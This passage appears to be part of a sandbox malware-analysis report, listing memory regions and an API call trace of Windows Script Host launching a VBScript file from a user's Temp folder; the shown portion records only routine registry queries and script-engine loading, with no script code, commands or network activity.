name = "private_0x00000000040c0000"
filename = ""
Region:
id = 1883
start_va = 0x4200000
end_va = 0x420ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004200000"
filename = ""
Region:
id = 1884
start_va = 0x74bd0000
end_va = 0x74bd5fff
entry_point = 0x74bd0000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 1885
start_va = 0x3b90000
end_va = 0x3bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b90000"
filename = ""
Region:
id = 1886
start_va = 0x3c10000
end_va = 0x3c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c10000"
filename = ""
Region:
id = 1887
start_va = 0x42b0000
end_va = 0x43affff
entry_point = 0x0
region_type = private
name = "private_0x00000000042b0000"
filename = ""
Region:
id = 1888
start_va = 0x43f0000
end_va = 0x43fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000043f0000"
filename = ""
Region:
id = 1889
start_va = 0x74900000
end_va = 0x74959fff
entry_point = 0x74900000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll")
Region:
id = 1890
start_va = 0x7ef98000
end_va = 0x7ef9afff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 1902
start_va = 0x74bc0000
end_va = 0x74bc7fff
entry_point = 0x74bc0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll")
Region:
id = 1903
start_va = 0x74bb0000
end_va = 0x74bbffff
entry_point = 0x74bb0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")
Region:
id = 1904
start_va = 0x748e0000
end_va = 0x748f1fff
entry_point = 0x748e0000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll")
Region:
id = 1905
start_va = 0x748d0000
end_va = 0x748d7fff
entry_point = 0x748d0000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll")
Region:
id = 1906
start_va = 0x748c0000
end_va = 0x748c5fff
entry_point = 0x748c0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 1907
start_va = 0x74880000
end_va = 0x748b7fff
entry_point = 0x74880000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 1937
start_va = 0x800000
end_va = 0x810fff
entry_point = 0x800000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1938
start_va = 0x3170000
end_va = 0x320efff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Region:
id = 1939
start_va = 0x3250000
end_va = 0x328ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003250000"
filename = ""
Region:
id = 1940
start_va = 0x32e0000
end_va = 0x331ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032e0000"
filename = ""
Region:
id = 1941
start_va = 0x3f60000
end_va = 0x3f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003f60000"
filename = ""
Region:
id = 1942
start_va = 0x4470000
end_va = 0x456ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004470000"
filename = ""
Region:
id = 1943
start_va = 0x7ef95000
end_va = 0x7ef97fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 1944
start_va = 0x74830000
end_va = 0x74879fff
entry_point = 0x74830000
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1945
start_va = 0x3ce0000
end_va = 0x3d9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ce0000"
filename = ""
Region:
id = 2074
start_va = 0x3d50000
end_va = 0x3d8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d50000"
filename = ""
Region:
id = 2075
start_va = 0x3d90000
end_va = 0x3d9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d90000"
filename = ""
Region:
id = 2076
start_va = 0x74750000
end_va = 0x747c7fff
entry_point = 0x74750000
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2132
start_va = 0x2340000
end_va = 0x2362fff
entry_point = 0x2340000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")
Region:
id = 2133
start_va = 0x2370000
end_va = 0x23affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 2233
start_va = 0x72a30000
end_va = 0x72fdafff
entry_point = 0x72a30000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 2245
start_va = 0x73ee0000
end_va = 0x7448afff
entry_point = 0x73ee0000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 2299
start_va = 0x74360000
end_va = 0x74458fff
entry_point = 0x74360000
region_type = mapped_file
name = "msado15.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll")
Region:
id = 2411
start_va = 0x74810000
end_va = 0x7482efff
entry_point = 0x74810000
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\SysWOW64\\msdart.dll" (normalized: "c:\\windows\\syswow64\\msdart.dll")
Region:
id = 2478
start_va = 0x2780000
end_va = 0x27bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2479
start_va = 0x27c0000
end_va = 0x27fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2493
start_va = 0x3ea0000
end_va = 0x3f3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ea0000"
filename = ""
Region:
id = 2494
start_va = 0x40c0000
end_va = 0x41bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000040c0000"
filename = ""
Region:
id = 2495
start_va = 0x755c0000
end_va = 0x75693fff
entry_point = 0x755c0000
region_type = mapped_file
name = "oledb32.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll")
Region:
id = 2498
start_va = 0x820000
end_va = 0x821fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000820000"
filename = ""
Region:
id = 2499
start_va = 0x755a0000
end_va = 0x755b6fff
entry_point = 0x755a0000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 2500
start_va = 0x75580000
end_va = 0x75593fff
entry_point = 0x75580000
region_type = mapped_file
name = "oledb32r.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll")
Region:
id = 2501
start_va = 0x75570000
end_va = 0x75571fff
entry_point = 0x75570000
region_type = mapped_file
name = "msader15.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll")
Region:
id = 2502
start_va = 0x2120000
end_va = 0x2124fff
entry_point = 0x2120000
region_type = mapped_file
name = "msader15.dll.mui"
filename = "\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui")
Region:
id = 2503
start_va = 0x4570000
end_va = 0x474ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004570000"
filename = ""
Region:
id = 2504
start_va = 0x4750000
end_va = 0x507ffff
entry_point = 0x4750000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 161
os_tid = 0x6e4
[0079.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efae0 | out: lpSystemTimeAsFileTime=0x1efae0*(dwLowDateTime=0xc2a7f6e0, dwHighDateTime=0x1d48634))
[0079.403] GetCurrentProcessId () returned 0x5a8
[0079.403] GetCurrentThreadId () returned 0x6e4
[0079.403] GetTickCount () returned 0x21c65
[0079.403] QueryPerformanceCounter (in: lpPerformanceCount=0x1efad8 | out: lpPerformanceCount=0x1efad8*=1815841300000) returned 1
[0079.403] GetStartupInfoA (in: lpStartupInfo=0x1efaf4 | out: lpStartupInfo=0x1efaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0079.404] GetModuleHandleA (lpModuleName=0x0) returned 0x630000
[0079.404] GetModuleHandleA (lpModuleName=0x0) returned 0x630000
[0079.404] GetVersionExA (in: lpVersionInformation=0x1efa04*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x1ef954, dwBuildNumber=0x0, dwPlatformId=0x1efb74, szCSDVersion="\xcd\x1e\xe9\x77\xde\xf4\x14") | out: lpVersionInformation=0x1efa04*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0079.404] GetUserDefaultLCID () returned 0x409
[0079.404] CoInitialize (pvReserved=0x0) returned 0x0
[0079.412] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" "
[0079.412] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" ") returned 85
[0079.412] GetCurrentThreadId () returned 0x6e4
[0079.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef814 | out: phkResult=0x1ef814*=0x98) returned 0x0
[0079.412] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef818 | out: phkResult=0x1ef818*=0x9c) returned 0x0
[0079.412] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1eebc8, lpData=0x1eebcc, lpcbData=0x1eebc4*=0x400 | out: lpType=0x1eebc8*=0x0, lpData=0x1eebcc*=0x0, lpcbData=0x1eebc4*=0x400) returned 0x2
[0079.412] RegQueryValueExW (in: hKey=0x98, lpValueName="Enabled", lpReserved=0x0, lpType=0x1eebc8, lpData=0x1eebcc, lpcbData=0x1eebc4*=0x400 | out: lpType=0x1eebc8*=0x0, lpData=0x1eebcc*=0x0, lpcbData=0x1eebc4*=0x400) returned 0x2
[0079.412] RegQueryValueExW (in: hKey=0x9c, lpValueName="Enabled", lpReserved=0x0, lpType=0x1eebc8, lpData=0x1eebcc, lpcbData=0x1eebc4*=0x400 | out: lpType=0x1eebc8*=0x0, lpData=0x1eebcc*=0x0, lpcbData=0x1eebc4*=0x400) returned 0x2
[0079.412] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0079.438] RegCloseKey (hKey=0x9c) returned 0x0
[0079.438] RegCloseKey (hKey=0x98) returned 0x0
[0079.438] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef5e4 | out: phkResult=0x1ef5e4*=0x98) returned 0x0
[0079.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef5e0 | out: phkResult=0x1ef5e0*=0x9c) returned 0x0
[0079.438] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ee970, lpData=0x1ee974, lpcbData=0x1ee96c*=0x400 | out: lpType=0x1ee970*=0x0, lpData=0x1ee974*=0x3, lpcbData=0x1ee96c*=0x400) returned 0x2
[0079.438] RegQueryValueExW (in: hKey=0x98, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ee970, lpData=0x1ee974, lpcbData=0x1ee96c*=0x400 | out: lpType=0x1ee970*=0x0, lpData=0x1ee974*=0x3, lpcbData=0x1ee96c*=0x400) returned 0x2
[0079.438] RegQueryValueExW (in: hKey=0x9c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ee970, lpData=0x1ee974, lpcbData=0x1ee96c*=0x400 | out: lpType=0x1ee970*=0x0, lpData=0x1ee974*=0x3, lpcbData=0x1ee96c*=0x400) returned 0x2
[0079.438] RegCloseKey (hKey=0x9c) returned 0x0
[0079.438] RegCloseKey (hKey=0x98) returned 0x0
[0079.438] GetACP () returned 0x4e4
[0079.438] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76220000
[0079.439] GetProcAddress (hModule=0x76220000, lpProcName="HeapSetInformation") returned 0x76235651
[0079.439] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0079.439] FreeLibrary (hLibModule=0x76220000) returned 1
[0079.439] CoRegisterMessageFilter (in: lpMessageFilter=0x831380, lplpMessageFilter=0x831388 | out: lplpMessageFilter=0x831388*=0x0) returned 0x0
[0079.439] IUnknown:AddRef (This=0x831380) returned 0x2
[0079.439] GetModuleFileNameW (in: hModule=0x630000, lpFilename=0x1ef854, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f
[0079.439] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x1ef268 | out: lpdwHandle=0x1ef268) returned 0x704
[0079.440] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x1eeb50 | out: lpData=0x1eeb50) returned 1
[0079.440] VerQueryValueW (in: pBlock=0x1eeb50, lpSubBlock="\\", lplpBuffer=0x1ef264, puLen=0x1ef260 | out: lplpBuffer=0x1ef264*=0x1eeb78, puLen=0x1ef260) returned 1
[0079.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef278 | out: phkResult=0x1ef278*=0x98) returned 0x0
[0079.440] RegQueryValueExW (in: hKey=0x98, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ee644, lpData=0x1ee648, lpcbData=0x1ee640*=0x400 | out: lpType=0x1ee644*=0x0, lpData=0x1ee648*=0xcd, lpcbData=0x1ee640*=0x400) returned 0x2
[0079.440] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef274 | out: phkResult=0x1ef274*=0x9c) returned 0x0
[0079.440] RegQueryValueExW (in: hKey=0x9c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1ef23c, lpData=0x1ef270, lpcbData=0x1ef244*=0x4 | out: lpType=0x1ef23c*=0x0, lpData=0x1ef270*=0x8f, lpcbData=0x1ef244*=0x4) returned 0x2
[0079.440] RegQueryValueExW (in: hKey=0x9c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ee644, lpData=0x1ee648, lpcbData=0x1ee640*=0x400 | out: lpType=0x1ee644*=0x0, lpData=0x1ee648*=0xcd, lpcbData=0x1ee640*=0x400) returned 0x2
[0079.440] RegQueryValueExW (in: hKey=0x98, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1ef23c, lpData=0x1ef270, lpcbData=0x1ef244*=0x4 | out: lpType=0x1ef23c*=0x0, lpData=0x1ef270*=0x8f, lpcbData=0x1ef244*=0x4) returned 0x2
[0079.440] RegQueryValueExW (in: hKey=0x98, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ee644, lpData=0x1ee648, lpcbData=0x1ee640*=0x400 | out: lpType=0x1ee644*=0x1, lpData="1", lpcbData=0x1ee640*=0x4) returned 0x0
[0079.440] lstrlenW (lpString="1") returned 1
[0079.440] lstrlenW (lpString="0") returned 1
[0079.440] lstrlenW (lpString="1") returned 1
[0079.440] lstrlenW (lpString="no") returned 2
[0079.440] lstrlenW (lpString="1") returned 1
[0079.440] lstrlenW (lpString="false") returned 5
[0079.440] RegCloseKey (hKey=0x9c) returned 0x0
[0079.440] RegCloseKey (hKey=0x98) returned 0x0
[0079.440] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1ef284, lpdwDisposition=0x0 | out: phkResult=0x1ef284*=0x98, lpdwDisposition=0x0) returned 0x0
[0079.441] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x1ef248, lpData=0x1ef278, lpcbData=0x1ef250*=0x4 | out: lpType=0x1ef248*=0x0, lpData=0x1ef278*=0xc0, lpcbData=0x1ef250*=0x4) returned 0x2
[0079.441] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ee650, lpData=0x1ee654, lpcbData=0x1ee64c*=0x400 | out: lpType=0x1ee650*=0x1, lpData="1", lpcbData=0x1ee64c*=0x4) returned 0x0
[0079.441] lstrlenW (lpString="1") returned 1
[0079.441] lstrlenW (lpString="0") returned 1
[0079.441] lstrlenW (lpString="1") returned 1
[0079.441] lstrlenW (lpString="no") returned 2
[0079.441] lstrlenW (lpString="1") returned 1
[0079.441] lstrlenW (lpString="false") returned 5
[0079.441] RegCloseKey (hKey=0x98) returned 0x0
[0079.441] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1ef284, lpdwDisposition=0x0 | out: phkResult=0x1ef284*=0x98, lpdwDisposition=0x0) returned 0x0
[0079.441] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x1ef248, lpData=0x1ef278, lpcbData=0x1ef250*=0x4 | out: lpType=0x1ef248*=0x0, lpData=0x1ef278*=0xc0, lpcbData=0x1ef250*=0x4) returned 0x2
[0079.441] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ee650, lpData=0x1ee654, lpcbData=0x1ee64c*=0x400 | out: lpType=0x1ee650*=0x0, lpData=0x1ee654*=0x31, lpcbData=0x1ee64c*=0x400) returned 0x2
[0079.441] RegCloseKey (hKey=0x98) returned 0x0
[0079.441] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS") returned 47
[0079.441] lstrlenW (lpString="vBS") returned 3
[0079.441] lstrlenW (lpString="WSH") returned 3
[0079.441] LoadStringW (in: hInstance=0x630000, uID=0x9c5, lpBuffer=0x1ed5d4, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
[0079.442] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x1eedfc*=0x0 | out: pptlib=0x1eedfc*=0x44fdb8) returned 0x0
[0079.461] ITypeLib:GetTypeInfoOfGuid (in: This=0x44fdb8, GUID=0x631acc, ppTInfo=0x1eede4 | out: ppTInfo=0x1eede4*=0x450eec) returned 0x0
[0079.464] ITypeInfo:GetRefTypeOfImplType (in: This=0x450eec, index=0xffffffff, pRefType=0x1eedd8 | out: pRefType=0x1eedd8*=0xfffffffe) returned 0x0
[0079.464] ITypeInfo:GetRefTypeInfo (in: This=0x450eec, hreftype=0xfffffffe, ppTInfo=0x649060 | out: ppTInfo=0x649060*=0x450f18) returned 0x0
[0079.464] IUnknown:Release (This=0x450eec) returned 0x1
[0079.464] ITypeLib:GetTypeInfoOfGuid (in: This=0x44fdb8, GUID=0x633c7c, ppTInfo=0x1eedd4 | out: ppTInfo=0x1eedd4*=0x450f44) returned 0x0
[0079.465] ITypeInfo:GetRefTypeOfImplType (in: This=0x450f44, index=0xffffffff, pRefType=0x1eedc8 | out: pRefType=0x1eedc8*=0xfffffffe) returned 0x0
[0079.465] ITypeInfo:GetRefTypeInfo (in: This=0x450f44, hreftype=0xfffffffe, ppTInfo=0x6490a0 | out: ppTInfo=0x6490a0*=0x450f70) returned 0x0
[0079.465] IUnknown:Release (This=0x450f44) returned 0x1
[0079.465] ITypeLib:GetTypeInfoOfGuid (in: This=0x44fdb8, GUID=0x633c8c, ppTInfo=0x1eedd4 | out: ppTInfo=0x1eedd4*=0x450f9c) returned 0x0
[0079.465] ITypeInfo:GetRefTypeOfImplType (in: This=0x450f9c, index=0xffffffff, pRefType=0x1eedc8 | out: pRefType=0x1eedc8*=0xfffffffe) returned 0x0
[0079.465] ITypeInfo:GetRefTypeInfo (in: This=0x450f9c, hreftype=0xfffffffe, ppTInfo=0x6490c0 | out: ppTInfo=0x6490c0*=0x450fc8) returned 0x0
[0079.465] IUnknown:Release (This=0x450f9c) returned 0x1
[0079.465] ITypeLib:GetTypeInfoOfGuid (in: This=0x44fdb8, GUID=0x631cac, ppTInfo=0x1eedd4 | out: ppTInfo=0x1eedd4*=0x450ff4) returned 0x0
[0079.465] ITypeInfo:GetRefTypeOfImplType (in: This=0x450ff4, index=0xffffffff, pRefType=0x1eedc8 | out: pRefType=0x1eedc8*=0xfffffffe) returned 0x0
[0079.465] ITypeInfo:GetRefTypeInfo (in: This=0x450ff4, hreftype=0xfffffffe, ppTInfo=0x649080 | out: ppTInfo=0x649080*=0x451020) returned 0x0
[0079.465] IUnknown:Release (This=0x450ff4) returned 0x1
[0079.465] IUnknown:Release (This=0x44fdb8) returned 0x4
[0079.465] GetCurrentThreadId () returned 0x6e4
[0079.465] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe8
[0079.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x632f25, lpParameter=0x8325d0, dwCreationFlags=0x0, lpThreadId=0x8325e4 | out: lpThreadId=0x8325e4*=0x8e4) returned 0xf0
[0079.466] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1eeffc*=0xe8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0079.471] CloseHandle (hObject=0xe8) returned 1
[0079.471] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", nBufferLength=0x104, lpBuffer=0x1ef05c, lpFilePart=0x1ef048 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpFilePart=0x1ef048*="ZMXZAA.vBS") returned 0x2f
[0079.472] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vBS", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ee5f0 | out: phkResult=0x1ee5f0*=0x102) returned 0x0
[0079.472] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x1ee5b8, lpData=0x1ee5f4, lpcbData=0x1ee5bc*=0x800 | out: lpType=0x1ee5b8*=0x1, lpData="VBSFile", lpcbData=0x1ee5bc*=0x10) returned 0x0
[0079.472] RegCloseKey (hKey=0x102) returned 0x0
[0079.472] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ee5f0 | out: phkResult=0x1ee5f0*=0x102) returned 0x0
[0079.472] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x1ee5b8, lpData=0x1eee2c, lpcbData=0x1ee5bc*=0x200 | out: lpType=0x1ee5b8*=0x1, lpData="VBScript", lpcbData=0x1ee5bc*=0x12) returned 0x0
[0079.472] RegCloseKey (hKey=0x102) returned 0x0
[0079.473] CLSIDFromString (in: lpsz="VBScript", pclsid=0x1eedfc | out: pclsid=0x1eedfc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
[0079.474] CoCreateInstance (in: rclsid=0x1eedfc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x631aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1eedf8 | out: ppv=0x1eedf8*=0x832a50) returned 0x0
[0079.483] __dllonexit () returned 0x74fe7164
[0079.483] __dllonexit () returned 0x74fe717e
[0079.483] __dllonexit () returned 0x74fe7198
[0079.483] GetUserDefaultLCID () returned 0x409
[0079.483] GetVersion () returned 0x1db10106
[0079.483] DllGetClassObject (in: rclsid=0x458f04*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ee0e4 | out: ppv=0x1ee0e4*=0x832a10) returned 0x0
[0079.484] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x832a10, pUnkOuter=0x0, riid=0x1eea90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ee0d0 | out: ppvObject=0x1ee0d0*=0x832a50) returned 0x0
[0079.484] GetUserDefaultLCID () returned 0x409
[0079.484] GetACP () returned 0x4e4
[0079.484] VBScriptEngine5:IUnknown:AddRef (This=0x832a50) returned 0x2
[0079.484] VBScriptEngine5:IUnknown:Release (This=0x832a50) returned 0x1
[0079.484] VBScriptEngine5:IUnknown:Release (This=0x832a10) returned 0x0
[0079.484] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x832a50, riid=0x631aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1eedc0 | out: ppvObject=0x1eedc0*=0x832a50) returned 0x0
[0079.484] VBScriptEngine5:IUnknown:Release (This=0x832a50) returned 0x1
[0079.485] GetCurrentThreadId () returned 0x6e4
[0079.485] GetCurrentThreadId () returned 0x6e4
[0079.485] GetCurrentThreadId () returned 0x6e4
[0079.485] GetUserDefaultLCID () returned 0x409
[0079.485] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0079.485] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1eedb0, cchData=6 | out: lpLCData="1252") returned 5
[0079.486] IsValidCodePage (CodePage=0x4e4) returned 1
[0079.486] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x75cf0000
[0079.486] GetProcAddress (hModule=0x75cf0000, lpProcName="CoCreateInstance") returned 0x75d39d0b
